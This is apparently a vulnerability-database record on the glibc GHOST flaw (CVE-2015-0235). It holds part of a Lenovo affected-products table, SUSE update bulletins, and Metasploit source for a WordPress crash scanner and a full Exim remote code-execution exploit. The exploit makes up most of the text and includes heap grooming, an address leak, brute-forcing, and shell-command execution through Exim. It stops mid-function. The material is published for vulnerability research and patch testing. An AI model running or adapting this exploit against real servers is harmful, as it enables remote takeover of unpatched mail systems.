affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected \nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link \n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 | Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected \nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "modified": "2016-07-22T00:00:00", "published": "2016-07-22T00:00:00", "id": "LENOVO:PS500043-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ghost", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (\"GHOST\")", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "description": "This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. (bsc#913646)\n\n", "modified": "2015-02-02T09:04:48", "published": "2015-02-02T09:04:48", "id": "OPENSUSE-SU-2015:0184-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00000.html", "title": "Security update for glibc (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:34", "bulletinFamily": "unix", "description": "CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. (bsc#913646)\n\n", "modified": "2015-01-28T19:04:53", "published": "2015-01-28T19:04:53", "id": "OPENSUSE-SU-2015:0162-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00030.html", "type": "suse", "title": "glibc (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:18:43", "bulletinFamily": "unix", "description": "This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. (bsc#913646)\n\n Security Issues:\n\n * CVE-2015-0235\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235</a>>\n\n", "modified": "2015-01-28T03:04:56", "published": "2015-01-28T03:04:56", "id": "SUSE-SU-2015:0158-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00028.html", "title": "Security update for glibc (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-01T16:08:39", "bulletinFamily": "exploit", "description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via a call to the WordPress XMLRPC interface. If the target is vulnerable, the system will segfault and return a server error. On patched systems, a normal XMLRPC error is returned.\n", "modified": "2017-07-24T13:26:21", "published": "2015-01-30T14:29:51", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "href": "", "type": "metasploit", "title": "WordPress XMLRPC GHOST Vulnerability Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress XMLRPC GHOST Vulnerability Scanner',\n 'Description' => %q{\n This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.\n },\n 'Author' =>\n [\n 'Robert Rowley',\n 'Christophe De La Fuente' ,\n 'Chaim Sanders' ,\n 'Felipe Costa' ,\n 'Jonathan Claudius' ,\n 'Karl Sigler' ,\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0235' ],\n [ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],\n [ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']\n ]\n ))\n\n register_options(\n [\n OptInt.new('LENGTH', [false, 'Payload length', 2500]),\n ])\n end\n\n def length\n datastore['LENGTH']\n end\n\n def run_host(ip)\n unless wordpress_and_online?\n print_error(\"Looks like this site is no WordPress blog\")\n return\n end\n\n unless wordpress_xmlrpc_enabled?\n print_error(\"XMLRPC interface is not enabled\")\n return\n end\n\n ghost = \"0\" * length\n payload = \"http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php\"\n xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)\n\n res = send_request_cgi(\n 'uri' => wordpress_url_xmlrpc,\n 'method' => 'POST',\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => xml\n )\n\n if res.nil? || res.code == 500\n print_good(\"vulnerable to GHOST\")\n report_vuln(\n :host => ip,\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :name => self.name,\n :info => \"Module #{self.fullname} found GHOST vulnerability\",\n :sname => datastore['SSL'] ? \"https\" : \"http\"\n )\n else\n print_status(\"target not vulnerable to GHOST\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb"}, {"lastseen": "2019-10-14T21:46:10", "bulletinFamily": "exploit", "description": "This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based buffer overflow in the GNU C Library's gethostbyname functions on x86 and x86_64 GNU/Linux systems that run the Exim mail server.\n", "modified": "2017-07-24T13:26:21", "published": "2015-03-18T23:51:16", "id": "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF", "href": "", "type": "metasploit", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\n 'Description' => %q{\n This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based\n buffer overflow in the GNU C Library's gethostbyname functions on x86\n and x86_64 GNU/Linux systems that run the Exim mail server.\n },\n 'Author' => [\n 'Unknown', # Discovered and published by Qualys, Inc.\n ],\n 'License' => BSD_LICENSE,\n 'References' => [\n ['CVE', '2015-0235'],\n ['US-CERT-VU', '967332'],\n ['OSVDB', '117579'],\n ['BID', '72325'],\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'],\n ['URL', 'https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability'],\n ['URL', 'http://r-7.co/1CAnMc0'] # MSF Wiki doc (this module's manual)\n ],\n 'DisclosureDate' => 'Jan 27 2015',\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X64], but ^\n 'Payload' => {\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\n 'DisableNops' => true,\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\n },\n 'Targets' => [['Automatic', {}]],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(25),\n OptAddress.new('SENDER_HOST_ADDRESS', [true,\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\n ])\n\n register_advanced_options([\n OptBool.new('FORCE_EXPLOIT', [false, 'Let the exploit run anyway without the check first', nil])\n ])\n end\n\n def check\n # for now, no information about the vulnerable state of the target\n check_code = Exploit::CheckCode::Unknown\n\n begin\n # not exploiting, just checking\n smtp_connect(false)\n\n # malloc()ate gethostbyname's buffer, and\n # make sure its next_chunk isn't the top chunk\n\n 9.times do\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\n smtp_recv(HELO_CODES)\n end\n\n # overflow (4 bytes) gethostbyname's buffer, and\n # overwrite its next_chunk's size field with 0x00303030\n\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\n # from now on, an exception means vulnerable\n check_code = Exploit::CheckCode::Vulnerable\n # raise an exception if no valid SMTP reply\n reply = smtp_recv(ANY_CODE)\n # can't determine vulnerable state if smtp_verify_helo() isn't called\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\n\n # realloc()ate gethostbyname's buffer, and\n # crash (old glibc) or abort (new glibc)\n # on the overwritten size field\n\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\n # raise an exception if no valid SMTP reply\n reply = smtp_recv(ANY_CODE)\n # can't determine vulnerable state if smtp_verify_helo() isn't called\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\n # a vulnerable target should've crashed by now\n check_code = Exploit::CheckCode::Safe\n\n rescue\n peer = \"#{rhost}:#{rport}\"\n vprint_status(\"Caught #{$!.class}: #{$!.message}\")\n\n ensure\n smtp_disconnect\n end\n\n return check_code\n end\n\n def exploit\n unless datastore['FORCE_EXPLOIT']\n print_status(\"Checking if target is vulnerable...\")\n fail_with(Failure::NotVulnerable, \"Vulnerability check failed\") if check != Exploit::CheckCode::Vulnerable\n print_good(\"Target is vulnerable.\")\n end\n information_leak\n code_execution\n end\n\n private\n\n HELO_CODES = '250|451|550'\n ANY_CODE = '[0-9]{3}'\n\n MIN_HEAP_SHIFT = 80\n MIN_HEAP_SIZE = 128 * 1024\n MAX_HEAP_SIZE = 1024 * 1024\n\n # Exim\n ALIGNMENT = 8\n STORE_BLOCK_SIZE = 8192\n STOREPOOL_MIN_SIZE = 256\n\n LOG_BUFFER_SIZE = 8192\n BIG_BUFFER_SIZE = 16384\n\n SMTP_CMD_BUFFER_SIZE = 16384\n IN_BUFFER_SIZE = 8192\n\n # GNU C Library\n PREV_INUSE = 0x1\n NS_MAXDNAME = 1025\n\n # Linux\n MMAP_MIN_ADDR = 65536\n\n def fail_with(fail_subject, message)\n message = \"#{message}. For more info: http://r-7.co/1CAnMc0\"\n super(fail_subject, message)\n end\n\n def information_leak\n print_status(\"Trying information leak...\")\n leaked_arch = nil\n leaked_addr = []\n\n # try different heap_shift values, in case Exim's heap address contains\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\n # we'll keep the longest one (the least likely to have been truncated)\n\n 16.times do\n done = catch(:another_heap_shift) do\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\n vprint_status(\"#{{ heap_shift: heap_shift }}\")\n\n # write the malloc_chunk header at increasing offsets (8-byte step),\n # until we overwrite the \"503 sender not yet given\" error message\n\n 128.step(256, 8) do |write_offset|\n error = try_information_leak(heap_shift, write_offset)\n vprint_status(\"#{{ write_offset: write_offset, error: error }}\")\n throw(:another_heap_shift) if not error\n next if error == \"503 sender not yet given\"\n\n # try a few more offsets (allows us to double-check things,\n # and distinguish between 32-bit and 64-bit machines)\n\n error = [error]\n 1.upto(5) do |i|\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\n throw(:another_heap_shift) if not error[i]\n end\n vprint_status(\"#{{ error: error }}\")\n\n _leaked_arch = leaked_arch\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\n leaked_arch = ARCH_X64\n\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\n (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\n leaked_arch = ARCH_X86\n\n else\n throw(:another_heap_shift)\n end\n vprint_status(\"#{{ leaked_arch: leaked_arch }}\")\n fail_with(Failure::BadConfig, \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\n\n # try different large-bins: most of them should be empty,\n # so keep the most frequent fd_nextsize address\n # (a pointer to the malloc_chunk itself)\n\n count = Hash.new(0)\n 0.upto(9) do |last_digit|\n error = try_information_leak(heap_shift, write_offset, last_digit)\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\n count[error] += 1\n end\n vprint_status(\"#{{ count: count }}\")\n throw(:another_heap_shift) if count.empty?\n\n # convert count to a nested array of [key, value] arrays and sort it\n error_count = count.sort { |a, b| b[1] <=> a[1] }\n error_count = error_count.first # most frequent\n error = error_count[0]\n count = error_count[1]\n throw(:another_heap_shift) unless count >= 6 # majority\n leaked_addr.push({ error: error, shift: heap_shift })\n\n # common-case shortcut\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\n (leaked_arch == ARCH_X64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\n leaked_addr = [leaked_addr.last] # use this one, and not another\n throw(:another_heap_shift, true) # done\n end\n throw(:another_heap_shift)\n end\n throw(:another_heap_shift)\n end\n break if done\n end\n\n fail_with(Failure::NotVulnerable, \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\n fail_with(Failure::NotVulnerable, \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\n\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\n leaked_addr = leaked_addr.first # longest\n error = leaked_addr[:error]\n shift = leaked_addr[:shift]\n\n leaked_addr = 0\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\n break if i >= error.length\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\n end\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\n fail_with(Failure::NoTarget, \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\n\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\n @leaked = { arch: leaked_arch, addr: leaked_addr }\n end\n\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\n fail_with(Failure::BadConfig, \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\n fail_with(Failure::BadConfig, \"heap_shift\") if (heap_shift & 15) != 0\n fail_with(Failure::BadConfig, \"write_offset\") if (write_offset & 7) != 0\n fail_with(Failure::BadConfig, \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\n\n smtp_connect\n\n # bulletproof Heap Feng Shui; the hard part is avoiding:\n # \"Too many syntax or protocol errors\" (3)\n # \"Too many unrecognized commands\" (3)\n # \"Too many nonmail commands\" (10)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\n smtp_recv(250)\n\n # overflow (3 bytes) gethostbyname's buffer, and\n # overwrite its next_chunk's size field with 0x003?31\n # ^ last_digit\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\n begin # ^ 0x30 | PREV_INUSE\n smtp_recv(HELO_CODES)\n\n smtp_send(\"RSET\")\n smtp_recv(250)\n\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\n smtp_recv(503, 'sender not yet given')\n\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"DATA\")\n reply = smtp_recv(503)\n\n lines = reply[:lines]\n fail if lines.size <= 3\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\n\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\n # but happens with lower probability)\n\n error = lines[+1..-3].join(\"\")\n error.sub!(/\\A503-/mn, \"\")\n error.sub!(/\\r\\n\\z/mn, \"\")\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\n return error\n\n rescue\n return nil\n end\n\n ensure\n smtp_disconnect\n end\n\n def code_execution\n print_status(\"Trying code execution...\")\n\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\n # that rogue child processes cannot use them.\n\n fail_with(Failure::BadConfig, \"encoded payload\") if payload.raw != payload.encoded\n fail_with(Failure::BadConfig, \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\n vprint_status(\"Command: #{command}\")\n\n # don't try to execute commands directly, try a very simple ACL first,\n # to distinguish between exploitation-problems and shellcode-problems\n\n acldrop = \"drop message=\"\n message = rand_text_alpha(command.length - acldrop.length)\n acldrop += message\n\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\n max_heap_addr = @leaked[:addr]\n min_heap_addr = nil\n survived = nil\n\n # we later fill log_buffer and big_buffer with alpha chars,\n # which creates a safe-zone at the beginning of the heap,\n # where we can't possibly crash during our brute-force\n\n # 4, because 3 copies of sender_helo_name, and step_len;\n # start big, but refine little by little in case\n # we crash because we overwrite important data\n\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\n loop do\n\n sender_helo_name = \"A\" * helo_len\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\n\n # the 3 copies of sender_helo_name, allocated by\n # host_build_sender_fullhost() in POOL_PERM memory\n\n helo_ip_size = ALIGNMENT +\n sender_helo_name[+1..-2].length\n\n sender_fullhost_size = ALIGNMENT +\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\n\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\n ).length\n\n # fit completely into the safe-zone\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\n loop do\n\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\n # with alpha chars, which creates another safe-zone at the end of the heap)\n heap_addr = max_heap_addr\n loop do\n\n # try harder the first time around: we obtain better\n # heap boundaries, and we usually hit our ACL faster\n\n (min_heap_addr ? 1 : 2).times do\n\n # try the same heap_addr several times, but with different random offsets,\n # in case we crash because our hijacked storeblock's length field is too small\n # (we don't control what's stored at heap_addr)\n\n rand_offset = rand(max_rand_offset)\n vprint_status(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\n vprint_status(\"#{{ reply: reply }}\") if reply\n\n if reply and\n reply[:code] == \"550\" and\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\n print_good(\"Brute-force SUCCESS\")\n print_good(\"Please wait for reply...\")\n # execute command this time, not acldrop\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\n vprint_status(\"#{{ reply: reply }}\")\n return handler\n end\n\n if not min_heap_addr\n if reply\n fail_with(Failure::BadConfig, \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\n survived = heap_addr\n else\n if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\n # survived should point to our safe-zone at the beginning of the heap\n fail_with(Failure::UnexpectedReply, \"never survived\") if not survived\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\n min_heap_addr = survived\n end\n end\n end\n end\n\n heap_addr -= step_len\n break if min_heap_addr and heap_addr < min_heap_addr\n end\n\n break if step_len < 1024\n step_len /= 2\n end\n\n helo_len /= 2\n break if helo_len < 1024\n # ^ otherwise the 3 copies of sender_helo_name will\n # fit into the current_block of POOL_PERM memory\n end\n fail_with(Failure::UnexpectedReply, \"Brute-force FAILURE\")\n end\n\n # our write-what-where primitive\n def try_code_execution(len, what, where)\n fail_with(Failure::UnexpectedReply, \"#{what.length} >= #{len}\") if what.length >= len\n fail_with(Failure::UnexpectedReply, \"#{where} < 0\") if where < 0\n\n x86 = (@leaked[:arch] == ARCH_X86)\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\n last_digit = 1 + rand(9)\n\n smtp_connect\n\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\n smtp_recv(501, 'sender address must contain a domain')\n\n smtp_send(\"RSET\")\n smtp_recv(250)\n\n # bulletproof Heap Feng Shui; the hard part is avoiding:\n # \"Too many syntax or protocol errors\" (3)\n # \"Too many unrecognized commands\" (3)\n # \"Too many nonmail commands\" (10)\n\n # / 5, because \"\\x7F\" is non-print, and:\n # ss = store_get(length + nonprintcount * 4 + 1);\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\n smtp_recv(250)\n\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\n\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\n smtp_recv(250)\n\n # overflow (3 bytes) gethostbyname's buffer, and\n # overwrite its next_chunk's size field with 0x003?31\n # ^ last_digit\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\n smtp_recv(HELO_CODES) # ^ 0x30 | 